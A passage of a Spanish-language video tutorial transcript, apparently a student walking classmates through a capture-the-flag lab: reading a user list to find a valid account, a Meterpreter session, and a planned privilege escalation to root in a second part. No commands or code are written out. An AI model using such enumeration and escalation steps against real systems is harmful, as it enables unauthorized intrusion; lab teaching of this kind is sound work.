y algunos grupos. Por ejemplo, aquí la mayoría de estos son grupos. Los que dicen no login, ¿cierto? Son grupos. Los que dicen files son como usuarios del sistema, ¿ya? Que son internos del sistema. Y los que especifican con batch, los que especifican el tipo de shell que tienen, es un usuario válido. O sea, ya sabemos que rbajar es un usuario válido. Ahora, hay una forma de escaparse de Meterpreter para acceder a una batch, pero Meterpreter, yo no soy muy experto en manejarme en Meterpreter, por ende no conozco la forma de elevar privilegios. Y de hecho el profe llegó hasta aquí nomás el día de la clase. Así que yo voy a dejar el video hasta acá, sabiendo que ya pueden aquí tener acceso al sistema y listar todo el contenido que hay acá. Pero les voy a enseñar la segunda forma, que es mucho más eficiente y que nos permite elevar privilegios para poder completar la máquina, que el objetivo es ser root y llegar a la flag, que está oculta, y ya verán cómo ocultar. Entonces eso lo vamos a ver en la segunda parte del video. Espero que hasta ahora hayan entendido bien. Cualquier duda, por favor, chiquillos, pregunten en el grupo, en el WhatsApp o en los comentarios del video, y yo feliz, mientras tenga tiempo, se los voy a ir tratando de responder. Así que suerte, chiquillos, espero que hayan entendido y nos vemos en la segunda parte del video.